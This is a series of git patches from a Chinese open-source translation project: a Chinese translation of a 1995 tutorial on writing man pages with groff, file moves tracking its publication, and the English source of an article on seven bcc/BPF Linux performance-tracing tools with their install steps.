Unix 程序员,你肯定需要编写和生成各种 man 手册页。在本文中,我们将通过编写一个简短的 man 手册页来介绍 `groff` 的使用。 -As with TeX, groff uses a particular text-formatting language to describe how to process the text. This language is slightly more cryptic than systems such as TeX, but also less verbose. In addition, groff provides several macro packages that are used on top of the basic formatter; these macro packages are tailored to a particular type of document. For example, the mgs macros are an ideal choice for writing articles and papers, while the man macros are used for man pages. +像 TeX 一样,`groff` 使用特定的文本格式化语言来描述如何处理文本。这种语言比 TeX 之类的系统更加神秘一些,但是更加简洁。此外,`groff` 在基本的格式化器之上提供了几个宏软件包;这些宏软件包是为一些特定类型的文档所定制的。举个例子, mgs 宏对于写作文章或论文很适合,而 man 宏可用于 man 手册页。 -### Writing a man Page +### 编写 man 手册页 -Writing man pages with groff is actually quite simple. For your man page to look like others, you need to follow several conventions in the source, which are presented below. In this example, we'll write a man page for a mythical command coffee that controls your networked coffee machine in various ways. +用 `groff` 编写 man 手册页十分简单。要让你的 man 手册页看起来和其它的一样,你需要从源头上遵循几个惯例,如下所示。在这个例子中,我们将为一个虚构的命令 `coffee` 编写 man 手册页,它用于以各种方式控制你的联网咖啡机。 -Using any text editor, enter the source from Listing 1 and save the result as coffee.man. Do not enter the line numbers at the beginning of each line; those are used only for reference later in the article. +使用任意文本编辑器,输入如下代码,并保存为 `coffee.man`。不要输入每行的行号,它们仅用于本文中的说明。 ``` .TH COFFEE 1 "23 March 94" .SH NAME -coffee /- Control remote coffee machine +coffee \- Control remote coffee machine .SH SYNOPSIS -/fBcoffee/fP [ -h | -b ] [ -t /fItype/fP ] -/fIamount/fP +\fBcoffee\fP [ -h | -b ] [ -t \fItype\fP ] +\fIamount\fP .SH DESCRIPTION -/fBcoffee/fP queues a request to the remote -coffee machine at the device /fB/dev/cf0/fR. -The required /fIamount/fP argument specifies +\fBcoffee\fP queues a request to the remote +coffee machine at the device \fB/dev/cf0\fR. +The required \fIamount\fP argument specifies the number of cups, generally between 0 and 12 on ISO standard coffee machines. .SS Options .TP -/fB-h/fP +\fB-h\fP Brew hot coffee. Cold is the default. .TP -/fB-b/fP +\fB-b\fP Burn coffee. Especially useful when executing -/fBcoffee/fP on behalf of your boss. +\fBcoffee\fP on behalf of your boss. .TP -/fB-t /fItype/fR +\fB-t \fItype\fR Specify the type of coffee to brew, where -/fItype/fP is one of /fBcolumbian/fP, -/fBregular/fP, or /fBdecaf/fP. +\fItype\fP is one of \fBcolumbian\fP, +\fBregular\fP, or \fBdecaf\fP. .SH FILES .TP -/fC/dev/cf0/fR +\fC/dev/cf0\fR The remote coffee machine device .SH "SEE ALSO" milk(5), sugar(5) @@ -57,15 +56,23 @@ May require human intervention if coffee supply is exhausted. ``` -Don't let the amount of obscurity in this source file frighten you. It helps to know that the character sequences \fB, \fI, and \fR are used to change the font to boldface, italics, and roman type, respectively. \fP sets the font to the one previously selected. +*清单 1:示例 man 手册页源文件* -Other groff requests appear on lines beginning with a dot (.). On line 1, we see that the .TH request is used to set the title of the man page to COFFEE, the man section to 1, and the date of the last man page revision. (Recall that man section 1 is used for user commands, section 2 is for system calls, and so forth. The man man command details each section number.) On line 2, the .SH request is used to start a section, entitled NAME. Note that almost all Unix man pages use the section progression NAME, SYNOPSIS, DESCRIPTION, FILES, SEE ALSO, NOTES, AUTHOR, and BUGS, with extra, optional sections as needed. This is just a convention used when writing man pages and isn't enforced by the software at all. +不要让这些晦涩的代码吓坏了你。字符串序列 `\fB`、`\fI` 和 `\fR` 分别用来改变字体为粗体、斜体和正体(罗马字体)。`\fP` 设置字体为前一个选择的字体。 -Line 3 gives the name of the command and a short description, after a dash ([mi]). You should use this format for the NAME section so that your man page can be added to the whatis database used by the man -k and apropos commands. +其它的 `groff` 请求request以点(`.`)开头出现在行首。第 1 行中,我们看到的 `.TH` 请求用于设置该 man 手册页的标题为 `COFFEE`、man 的部分为 `1`、以及该 man 手册页的最新版本的日期。(说明,man 手册的第 1 部分用于用户命令、第 2 部分用于系统调用等等。使用 `man man` 命令了解各个部分)。 -On lines 4—6 we give the synopsis of the command syntax for coffee. Note that italic type \fI...\fP is used to denote parameters on the command line, and that optional arguments are enclosed in square brackets. +在第 2 行,`.SH` 请求用于标记一个section的开始,并给该节名称为 `NAME`。注意,大部分的 Unix man 手册页依次使用 `NAME`、 `SYNOPSIS`、`DESCRIPTION`、`FILES`、`SEE ALSO`、`NOTES`、`AUTHOR` 和 `BUGS` 等节,个别情况下也需要一些额外的可选节。这只是编写 man 手册页的惯例,并不强制所有软件都如此。 -Lines 7—12 give a brief description of the command. Boldface type is generally used to denote program and file names. On line 13, a subsection named Options is started with the .SS request. Following this on lines 14—25 is a list of options, presented using a tagged list. Each item in the tagged list is marked with the .TPrequest; the line after .TP is the tag, after which follows the item text itself. For example, the source on lines 14—16: +第 3 行给出命令的名称,并在一个横线(`-`)后给出简短描述。在 `NAME` 节使用这个格式以便你的 man 手册页可以加到 whatis 数据库中——它可以用于 `man -k` 或 `apropos` 命令。 + +第 4-6 行我们给出了 `coffee` 命令格式的大纲。注意,斜体 `\fI...\fP` 用于表示命令行的参数,可选参数用方括号扩起来。 + +第 7-12 行给出了该命令的摘要介绍。粗体通常用于表示程序或文件的名称。 + +在 13 行,使用 `.SS` 开始了一个名为 `Options` 的子节。 + +接着第 14-25 行是选项列表,会使用参数列表样式表示。参数列表中的每一项以 `.TP` 请求来标记;`.TP` 后的行是参数,再之后是该项的文本。例如,第 14-16 行: ``` .TP @@ -73,22 +80,29 @@ Lines 7—12 give a brief description of the command. Boldface type is generally Brew hot coffee. Cold is the default. ``` +将会显示如下: + ``` -h Brew hot coffee. Cold is the default. ``` -Lines 26—29 make up the FILES section of the man page, which describes any files that the command might use to do its work. A tagged list using the .TP request is used for this as well. +第 26-29 行创建该 man 手册页的 `FILES` 节,它用于描述该命令可能使用的文件。可以使用 `.TP` 请求来表示文件列表。 -On lines 30—31, the SEE ALSO section is given, which provides cross-references to other man pages of note. Notice that the string <\#34>SEE ALSO<\#34>following the .SH request on line 30 is in quotes; this is because .SH uses the first whitespace-delimited argument as the section title. Therefore any section titles that are more than one word need to be enclosed in quotes to make up a single argument. Finally, on lines 32—34, the BUGS section is presented. +第 30-31 行,给出了 `SEE ALSO` 节,它提供了其它可以参考的 man 手册页。注意,第 30 行的 `.SH` 请求中 `"SEE ALSO"` 使用括号扩起来,这是因为 `.SH` 使用第一个空格来分隔该节的标题。任何超过一个单词的标题都需要使用引号扩起来成为一个单一参数。 -### Formatting and Installing the man Page +最后,第 32-34 行,是 `BUGS` 节。 + +### 格式化和安装 man 手册页 + +为了在你的屏幕上查看这个手册页格式化的样式,你可以使用如下命令: -In order to format this man page and view it on your screen, you can use the command: ``` $ groff -Tascii -man coffee.man | more ``` +`-Tascii` 选项告诉 `groff` 生成普通 ASCII 输出;`-man` 告诉 `groff` 使用 man 手册页宏集合。如果一切正常,这个 man 手册页显示应该如下。 + ``` COFFEE(1) COFFEE(1) NAME @@ -117,39 +131,47 @@ BUGS exhausted. ``` -As mentioned before, groff is capable of producing other types of output. Using the -Tps option in place of -Tascii will produce PostScript output that you can save to a file, view with GhostView, or print on a PostScript printer. -Tdvi will produce device-independent .dvi output similar to that produced by TeX. +*格式化的 man 手册页* -If you wish to make the man page available for others to view on your system, you need to install the groff source in a directory that is present in other users' MANPATH. The location for standard man pages is /usr/man. The source for section 1 man pages should therefore go in /usr/man/man1\. Therefore, the command: +如之前提到过的,`groff` 能够生成其它类型的输出。使用 `-Tps` 选项替代 `-Tascii` 将会生成 PostScript 输出,你可以将其保存为文件,用 GhostView 查看,或用一个 PostScript 打印机打印出来。`-Tdvi` 会生成设备无关的 .dvi 输出,类似于 TeX 的输出。 + +如果你希望让别人在你的系统上也可以查看这个 man 手册页,你需要安装这个 groff 源文件到其它用户的 `%MANPATH` 目录里面。标准的 man 手册页放在 `/usr/man`。第一部分的 man 手册页应该放在 `/usr/man/man1` 下,因此,使用命令: ``` $ cp coffee.man /usr/man/man1/coffee.1 ``` -If you can't copy man page sources directly to /usr/man (say, because you're not the system administrator), you can create your own man page directory tree and add it to your MANPATH. The MANPATH environment variable is of the same format asPATH; for example, to add the directory /home/mdw/man to MANPATH just use: +这将安装该 man 手册页到 `/usr/man` 中供所有人使用(注意使用 `.1` 扩展名而不是 `.man`)。当接下来执行 `man coffee` 命令时,该 man 手册页会被自动重新格式化,并且可查看的文本会被保存到 `/usr/man/cat1/coffee.1.Z` 中。 + +如果你不能直接复制 man 手册页的源文件到 `/usr/man`(比如说你不是系统管理员),你可创建你自己的 man 手册页目录树,并将其加入到你的 `%MANPATH`。`%MANPATH` 环境变量的格式同 `%PATH` 一样,举个例子,要添加目录 `/home/mdw/man` 到 `%MANPATH` ,只需要: ``` $ export MANPATH=/home/mdw/man:$MANPATH ``` +`groff` 和 man 手册页宏还有许多其它的选项和格式化命令。找到它们的最好办法是查看 `/usr/lib/groff` 中的文件; `tmac` 目录包含了宏文件,自身通常会包含其所提供的命令的文档。要让 `groff` 使用特定的宏集合,只需要使用 `-m macro` (或 `-macro`) 选项。例如,要使用 mgs 宏,使用命令: + ``` groff -Tascii -mgs files... ``` -Unfortunately, the macro sets provided with groff are not well-documented. There are section 7 man pages for some of them; for example, man 7 groff_mm will tell you about the mm macro set. However, this documentation usually only covers the differences and new features in the groff implementation, which assumes you have access to the man pages for the original nroff/troff macro sets (known as DWB—the Documentor's Work Bench). The best source of information may be a book on using nroff/troff which covers these classic macro sets in detail. For more about writing man pages, you can always look at the man page sources (in /usr/man) and determine what they do by comparing the formatted output with the source. +`groff` 的 man 手册页对这个选项描述了更多细节。 -This article is adapted from Running Linux, by Matt Welsh and Lar Kaufman, published by O'Reilly and Associates (ISBN 1-56592-100-3). Among other things, this book includes tutorials of various text-formatting systems used under Linux. Information in this issue of Linux Journal as well as Running Linux should provide a good head-start on using the many text tools available for the system. +不幸的是,随同 `groff` 提供的宏集合没有完善的文档。第 7 部分的 man 手册页提供了一些,例如,`man 7 groff_mm` 会给你 mm 宏集合的信息。然而,该文档通常只覆盖了在 `groff` 实现中不同和新功能,而假设你已经了解过原来的 nroff/troff 宏集合(称作 DWB:the Documentor's Work Bench)。最佳的信息来源或许是一本覆盖了那些经典宏集合细节的书。要了解更多的编写 man 手册页的信息,你可以看看 man 手册页源文件(`/usr/man` 中),并通过它们来比较源文件的输出。 -### Good luck, and happy documenting! +这篇文章是《Running Linux》 中的一章,由 Matt Welsh 和 Lar Kaufman 著,奥莱理出版(ISBN 1-56592-100-3)。在本书中,还包括了 Linux 下使用的各种文本格式化系统的教程。这期的《Linux Journal》中的内容及《Running Linux》应该可以给你提供在 Linux 上使用各种文本工具的良好开端。 -Matt Welsh ([mdw@cs.cornell.edu][1]) is a student and systems programmer at Cornell University, working with the Robotics and Vision Laboratory on projects dealing with real-time machine vision. +### 祝好,撰写快乐! + +Matt Welsh ([mdw@cs.cornell.edu][1])是康奈尔大学的一名学生和系统程序员,在机器人和视觉实验室从事于时时机器视觉研究。 -------------------------------------------------------------------------------- via: http://www.linuxjournal.com/article/1158 作者:[Matt Welsh][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) +译者:[wxy](https://github.com/wxy) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From c3806936de2ce159bc1e335df016f474809f88df Mon Sep 17 00:00:00 2001 From: qhwdw Date: Fri, 8 Dec 2017 18:15:01 +0800 Subject: [PATCH 0416/1627] Translating by qhwdw --- .../tech/20171102 Dive into BPF a list of reading material.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171102 Dive into BPF a list of reading material.md b/sources/tech/20171102 Dive into BPF a list of reading material.md index f4b90bd09d..d352e4a7c6 100644 --- a/sources/tech/20171102 Dive into BPF a list of reading material.md +++ b/sources/tech/20171102 Dive into BPF a list of reading material.md @@ -1,4 +1,4 @@ -Dive into BPF: a list of reading material +Translating by qhwdw Dive into BPF: a list of reading material ============================================================ * [What is BPF?][143] @@ -709,3 +709,5 @@ via: https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ [190]:https://github.com/torvalds/linux [191]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md [192]:https://qmonnet.github.io/whirl-offload/categories/#BPF + + From f1a3ed70e18107ee50b66c5b91b78abf493842d3 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 18:30:52 +0800 Subject: [PATCH 0417/1627] TRD:19951001 Writing man Pages Using groff.md @wxy --- .../tech/19951001 Writing man Pages Using groff.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename {sources => translated}/tech/19951001 Writing man Pages Using groff.md (99%) diff --git a/sources/tech/19951001 Writing man Pages Using groff.md b/translated/tech/19951001 Writing man Pages Using groff.md similarity index 99% rename from sources/tech/19951001 Writing man Pages Using groff.md rename to translated/tech/19951001 Writing man Pages Using groff.md index 896c6ebe48..360bfcaf4a 100644 --- a/sources/tech/19951001 Writing man Pages Using groff.md +++ b/translated/tech/19951001 Writing man Pages Using groff.md @@ -1,4 +1,4 @@ -使用 groff 编写 man 手册页页 +使用 groff 编写 man 手册页 =================== `groff` 是大多数 Unix 系统上所提供的流行的文本格式化工具 nroff/troff 的 GNU 版本。它一般用于编写手册页,即命令、编程接口等的在线文档。在本文中,我们将给你展示如何使用 `groff` 编写你自己的 man 手册页。 From 61bc4155dd2d58476a834994e699176b8bcb324c Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 18:31:26 +0800 Subject: [PATCH 0418/1627] PUB:19951001 Writing man Pages Using groff.md https://linux.cn/article-9122-1.html --- .../tech => published}/19951001 Writing man Pages Using groff.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/19951001 Writing man Pages Using groff.md (100%) diff --git a/translated/tech/19951001 Writing man Pages Using groff.md b/published/19951001 Writing man Pages Using groff.md similarity index 100% rename from translated/tech/19951001 Writing man Pages Using groff.md rename to published/19951001 Writing man Pages Using groff.md From c7df54d7f2fad2f82148c1f8055aac6e262611ef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Fri, 8 Dec 2017 20:12:40 +0800 Subject: [PATCH 0419/1627] =?UTF-8?q?=E9=80=89=E9=A2=98=207=20tools=20for?= =?UTF-8?q?=20analyzing=20performance=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 选题文章名 7 tools for analyzing performance in Linux with bcc/BPF --- ...lyzing performance in Linux with bccBPF.md | 402 ++++++++++++++++++ 1 file changed, 402 insertions(+) create mode 100644 sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md diff --git a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md new file mode 100644 index 0000000000..e6fd19e212 --- /dev/null +++ b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md @@ -0,0 +1,402 @@ +translating by yongshouzhang + +7 tools for analyzing performance in Linux with bcc/BPF +============================================================ + +### Look deeply into your Linux code with these Berkeley Packet Filter (BPF) Compiler Collection (bcc) tools. + + [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/pictures/brendan_face2017_620d.jpg?itok=xZzBQNcY)][7] 21 Nov 2017 [Brendan Gregg][8] [Feed][9] + +43[up][10] + + [4 comments][11] +![7 superpowers for Fedora bcc/BPF performance analysis](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/penguins%20in%20space_0.jpg?itok=umpCTAul) + +Image by : + +opensource.com + +A new technology has arrived in Linux that can provide sysadmins and developers with a large number of new tools and dashboards for performance analysis and troubleshooting. It's called the enhanced Berkeley Packet Filter (eBPF, or just BPF), although these enhancements weren't developed in Berkeley, they operate on much more than just packets, and they do much more than just filtering. I'll discuss one way to use BPF on the Fedora and Red Hat family of Linux distributions, demonstrating on Fedora 26. + +BPF can run user-defined sandboxed programs in the kernel to add new custom capabilities instantly. It's like adding superpowers to Linux, on demand. Examples of what you can use it for include: + +* Advanced performance tracing tools: programmatic low-overhead instrumentation of filesystem operations, TCP events, user-level events, etc. + +* Network performance: dropping packets early on to improve DDOS resilience, or redirecting packets in-kernel to improve performance + +* Security monitoring: 24x7 custom monitoring and logging of suspicious kernel and userspace events + +BPF programs must pass an in-kernel verifier to ensure they are safe to run, making it a safer option, where possible, than writing custom kernel modules. I suspect most people won't write BPF programs themselves, but will use other people's. I've published many on GitHub as open source in the [BPF Compiler Collection (bcc)][12] project. bcc provides different frontends for BPF development, including Python and Lua, and is currently the most active project for BPF tooling. + +### 7 useful new bcc/BPF tools + +To understand the bcc/BPF tools and what they instrument, I created the following diagram and added it to the bcc project: + +### [bcc_tracing_tools.png][13] + +![Linux bcc/BPF tracing tools diagram](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) + +Brendan Gregg, [CC BY-SA 4.0][14] + +These are command-line interface (CLI) tools you can use over SSH (secure shell). Much analysis nowadays, including at my employer, is conducted using GUIs and dashboards. SSH is a last resort. But these CLI tools are still a good way to preview BPF capabilities, even if you ultimately intend to use them only through a GUI when available. I've began adding BPF capabilities to an open source GUI, but that's a topic for another article. Right now I'd like to share the CLI tools, which you can use today. + +### 1\. execsnoop + +Where to start? How about watching new processes. These can consume system resources, but be so short-lived they don't show up in top(1) or other tools. They can be instrumented (or, using the industry jargon for this, they can be traced) using [execsnoop][15]. While tracing, I'll log in over SSH in another window: + +``` +# /usr/share/bcc/tools/execsnoop +PCOMM PID PPID RET ARGS +sshd 12234 727 0 /usr/sbin/sshd -D -R +unix_chkpwd 12236 12234 0 /usr/sbin/unix_chkpwd root nonull +unix_chkpwd 12237 12234 0 /usr/sbin/unix_chkpwd root chkexpiry +bash 12239 12238 0 /bin/bash +id 12241 12240 0 /usr/bin/id -un +hostname 12243 12242 0 /usr/bin/hostname +pkg-config 12245 12244 0 /usr/bin/pkg-config --variable=completionsdir bash-completion +grepconf.sh 12246 12239 0 /usr/libexec/grepconf.sh -c +grep 12247 12246 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +tty 12249 12248 0 /usr/bin/tty -s +tput 12250 12248 0 /usr/bin/tput colors +dircolors 12252 12251 0 /usr/bin/dircolors --sh /etc/DIR_COLORS +grep 12253 12239 0 /usr/bin/grep -qi ^COLOR.*none /etc/DIR_COLORS +grepconf.sh 12254 12239 0 /usr/libexec/grepconf.sh -c +grep 12255 12254 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +grepconf.sh 12256 12239 0 /usr/libexec/grepconf.sh -c +grep 12257 12256 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS +``` + +Welcome to the fun of system tracing. You can learn a lot about how the system is really working (or not working, as the case may be) and discover some easy optimizations along the way. execsnoop works by tracing the exec() system call, which is usually used to load different program code in new processes. + +### 2\. opensnoop + +Continuing from above, so, grepconf.sh is likely a shell script, right? I'll run file(1) to check, and also use the [opensnoop][16] bcc tool to see what file is opening: + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +12420 file 3 0 /etc/ld.so.cache +12420 file 3 0 /lib64/libmagic.so.1 +12420 file 3 0 /lib64/libz.so.1 +12420 file 3 0 /lib64/libc.so.6 +12420 file 3 0 /usr/lib/locale/locale-archive +12420 file -1 2 /etc/magic.mgc +12420 file 3 0 /etc/magic +12420 file 3 0 /usr/share/misc/magic.mgc +12420 file 3 0 /usr/lib64/gconv/gconv-modules.cache +12420 file 3 0 /usr/libexec/grepconf.sh +1 systemd 16 0 /proc/565/cgroup +1 systemd 16 0 /proc/536/cgroup +``` + +``` +# file /usr/share/misc/magic.mgc /etc/magic +/usr/share/misc/magic.mgc: magic binary file for file(1) cmd (version 14) (little endian) +/etc/magic: magic text file for file(1) cmd, ASCII text +``` + +### 3\. xfsslower + +bcc/BPF can analyze much more than just syscalls. The [xfsslower][17] tool traces common XFS filesystem operations that have a latency of greater than 1 millisecond (the argument): + +``` +# /usr/share/bcc/tools/xfsslower 1 +Tracing XFS operations slower than 1 ms +TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME +14:17:34 systemd-journa 530 S 0 0 1.69 system.journal +14:17:35 auditd 651 S 0 0 2.43 audit.log +14:17:42 cksum 4167 R 52976 0 1.04 at +14:17:45 cksum 4168 R 53264 0 1.62 [ +14:17:45 cksum 4168 R 65536 0 1.01 certutil +14:17:45 cksum 4168 R 65536 0 1.01 dir +14:17:45 cksum 4168 R 65536 0 1.17 dirmngr-client +14:17:46 cksum 4168 R 65536 0 1.06 grub2-file +14:17:46 cksum 4168 R 65536 128 1.01 grub2-fstest +[...] +``` + +This is a useful tool and an important example of BPF tracing. Traditional analysis of filesystem performance focuses on block I/O statistics—what you commonly see printed by the iostat(1) tool and plotted by many performance-monitoring GUIs. Those statistics show how the disks are performing, but not really the filesystem. Often you care more about the filesystem's performance than the disks, since it's the filesystem that applications make requests to and wait for. And the performance of filesystems can be quite different from that of disks! Filesystems may serve reads entirely from memory cache and also populate that cache via a read-ahead algorithm and for write-back caching. xfsslower shows filesystem performance—what the applications directly experience. This is often useful for exonerating the entire storage subsystem; if there is really no filesystem latency, then performance issues are likely to be elsewhere. + +### 4\. biolatency + +Although filesystem performance is important to study for understanding application performance, studying disk performance has merit as well. Poor disk performance will affect the application eventually, when various caching tricks can no longer hide its latency. Disk performance is also a target of study for capacity planning. + +The iostat(1) tool shows the average disk I/O latency, but averages can be misleading. It can be useful to study the distribution of I/O latency as a histogram, which can be done using [biolatency][18]: + +``` +# /usr/share/bcc/tools/biolatency +Tracing block device I/O... Hit Ctrl-C to end. +^C + usecs : count distribution + 0 -> 1 : 0 | | + 2 -> 3 : 0 | | + 4 -> 7 : 0 | | + 8 -> 15 : 0 | | + 16 -> 31 : 0 | | + 32 -> 63 : 1 | | + 64 -> 127 : 63 |**** | + 128 -> 255 : 121 |********* | + 256 -> 511 : 483 |************************************ | + 512 -> 1023 : 532 |****************************************| + 1024 -> 2047 : 117 |******** | + 2048 -> 4095 : 8 | | +``` + +It's worth noting that many of these tools support CLI options and arguments as shown by their USAGE message: + +``` +# /usr/share/bcc/tools/biolatency -h +usage: biolatency [-h] [-T] [-Q] [-m] [-D] [interval] [count] + +Summarize block device I/O latency as a histogram + +positional arguments: + interval output interval, in seconds + count number of outputs + +optional arguments: + -h, --help show this help message and exit + -T, --timestamp include timestamp on output + -Q, --queued include OS queued time in I/O time + -m, --milliseconds millisecond histogram + -D, --disks print a histogram per disk device + +examples: + ./biolatency # summarize block I/O latency as a histogram + ./biolatency 1 10 # print 1 second summaries, 10 times + ./biolatency -mT 1 # 1s summaries, milliseconds, and timestamps + ./biolatency -Q # include OS queued time in I/O time + ./biolatency -D # show each disk device separately +``` + +### 5\. tcplife + +Another useful tool and example, this time showing lifespan and throughput statistics of TCP sessions, is [tcplife][19]: + +``` +# /usr/share/bcc/tools/tcplife +PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS +12759 sshd 192.168.56.101 22 192.168.56.1 60639 2 3 1863.82 +12783 sshd 192.168.56.101 22 192.168.56.1 60640 3 3 9174.53 +12844 wget 10.0.2.15 34250 54.204.39.132 443 11 1870 5712.26 +12851 curl 10.0.2.15 34252 54.204.39.132 443 0 74 505.90 +``` + +### 6\. gethostlatency + +Every previous example involves kernel tracing, so I need at least one user-level tracing example. Here is [gethostlatency][20], which instruments gethostbyname(3) and related library calls for name resolution: + +``` +# /usr/share/bcc/tools/gethostlatency +TIME PID COMM LATms HOST +06:43:33 12903 curl 188.98 opensource.com +06:43:36 12905 curl 8.45 opensource.com +06:43:40 12907 curl 6.55 opensource.com +06:43:44 12911 curl 9.67 opensource.com +06:45:02 12948 curl 19.66 opensource.cats +06:45:06 12950 curl 18.37 opensource.cats +06:45:07 12952 curl 13.64 opensource.cats +06:45:19 13139 curl 13.10 opensource.cats +``` + +### 7\. trace + +Okay, one more example. The [trace][21] tool was contributed by Sasha Goldshtein and provides some basic printf(1) functionality with custom probes. For example: + +``` +# /usr/share/bcc/tools/trace 'pam:pam_start "%s: %s", arg1, arg2' +PID TID COMM FUNC - +13266 13266 sshd pam_start sshd: root +``` + +### Install bcc via packages + +The best way to install bcc is from an iovisor repository, following the instructions from the bcc [INSTALL.md][22]. [IO Visor][23] is the Linux Foundation project that includes bcc. The BPF enhancements these tools use were added in the 4.x series Linux kernels, up to 4.9\. This means that Fedora 25, with its 4.8 kernel, can run most of these tools; and Fedora 26, with its 4.11 kernel, can run them all (at least currently). + +If you are on Fedora 25 (or Fedora 26, and this post was published many months ago—hello from the distant past!), then this package approach should just work. If you are on Fedora 26, then skip to the [Install via Source][24] section, which avoids a [known][25] and [fixed][26] bug. That bug fix hasn't made its way into the Fedora 26 package dependencies at the moment. The system I'm using is: + +``` +# uname -a +Linux localhost.localdomain 4.11.8-300.fc26.x86_64 #1 SMP Thu Jun 29 20:09:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux +# cat /etc/fedora-release +Fedora release 26 (Twenty Six) +``` + +``` +# echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f25/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo +# dnf install bcc-tools +[...] +Total download size: 37 M +Installed size: 143 M +Is this ok [y/N]: y +``` + +``` +# ls /usr/share/bcc/tools/ +argdist dcsnoop killsnoop softirqs trace +bashreadline dcstat llcstat solisten ttysnoop +[...] +``` + +``` +# /usr/share/bcc/tools/opensnoop +chdir(/lib/modules/4.11.8-300.fc26.x86_64/build): No such file or directory +Traceback (most recent call last): + File "/usr/share/bcc/tools/opensnoop", line 126, in + b = BPF(text=bpf_text) + File "/usr/lib/python3.6/site-packages/bcc/__init__.py", line 284, in __init__ + raise Exception("Failed to compile BPF module %s" % src_file) +Exception: Failed to compile BPF module +``` + +``` +# dnf install kernel-devel-4.11.8-300.fc26.x86_64 +[...] +Total download size: 20 M +Installed size: 63 M +Is this ok [y/N]: y +[...] +``` + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +11792 ls 3 0 /etc/ld.so.cache +11792 ls 3 0 /lib64/libselinux.so.1 +11792 ls 3 0 /lib64/libcap.so.2 +11792 ls 3 0 /lib64/libc.so.6 +[...] +``` + +### Install via source + +If you need to install from source, you can also find documentation and updated instructions in [INSTALL.md][27]. I did the following on Fedora 26: + +``` +sudo dnf install -y bison cmake ethtool flex git iperf libstdc++-static \ + python-netaddr python-pip gcc gcc-c++ make zlib-devel \ + elfutils-libelf-devel +sudo dnf install -y luajit luajit-devel # for Lua support +sudo dnf install -y \ + http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm +sudo pip install pyroute2 +sudo dnf install -y clang clang-devel llvm llvm-devel llvm-static ncurses-devel +``` + +``` +Curl error (28): Timeout was reached for http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm [Connection timed out after 120002 milliseconds] +``` + +Here are the remaining bcc compilation and install steps: + +``` +git clone https://github.com/iovisor/bcc.git +mkdir bcc/build; cd bcc/build +cmake .. -DCMAKE_INSTALL_PREFIX=/usr +make +sudo make install +``` + +``` +# /usr/share/bcc/tools/opensnoop +PID COMM FD ERR PATH +4131 date 3 0 /etc/ld.so.cache +4131 date 3 0 /lib64/libc.so.6 +4131 date 3 0 /usr/lib/locale/locale-archive +4131 date 3 0 /etc/localtime +[...] +``` + +More Linux resources + +* [What is Linux?][1] + +* [What are Linux containers?][2] + +* [Download Now: Linux commands cheat sheet][3] + +* [Advanced Linux commands cheat sheet][4] + +* [Our latest Linux articles][5] + +This was a quick tour of the new BPF performance analysis superpowers that you can use on the Fedora and Red Hat family of operating systems. I demonstrated the popular + + [bcc][28] + +frontend to BPF and included install instructions for Fedora. bcc comes with more than 60 new tools for performance analysis, which will help you get the most out of your Linux systems. Perhaps you will use these tools directly over SSH, or perhaps you will use the same functionality via monitoring GUIs once they support BPF. + +Also, bcc is not the only frontend in development. There are [ply][29] and [bpftrace][30], which aim to provide higher-level language for quickly writing custom tools. In addition, [SystemTap][31] just released [version 3.2][32], including an early, experimental eBPF backend. Should this continue to be developed, it will provide a production-safe and efficient engine for running the many SystemTap scripts and tapsets (libraries) that have been developed over the years. (Using SystemTap with eBPF would be good topic for another post.) + +If you need to develop custom tools, you can do that with bcc as well, although the language is currently much more verbose than SystemTap, ply, or bpftrace. My bcc tools can serve as code examples, plus I contributed a [tutorial][33] for developing bcc tools in Python. I'd recommend learning the bcc multi-tools first, as you may get a lot of mileage from them before needing to write new tools. You can study the multi-tools from their example files in the bcc repository: [funccount][34], [funclatency][35], [funcslower][36], [stackcount][37], [trace][38], and [argdist][39]. + +Thanks to [Opensource.com][40] for edits. + +### Topics + + [Linux][41][SysAdmin][42] + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] Brendan Gregg + +- + + Brendan Gregg is a senior performance architect at Netflix, where he does large scale computer performance design, analysis, and tuning.[More about me][44] + +* [Learn how you can contribute][6] + +-------------------------------------------------------------------------------- + +via:https://opensource.com/article/17/11/bccbpf-performance + +作者:[Brendan Gregg ][a] +译者:[yongshouzhang](https://github.com/yongshouzhang) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: 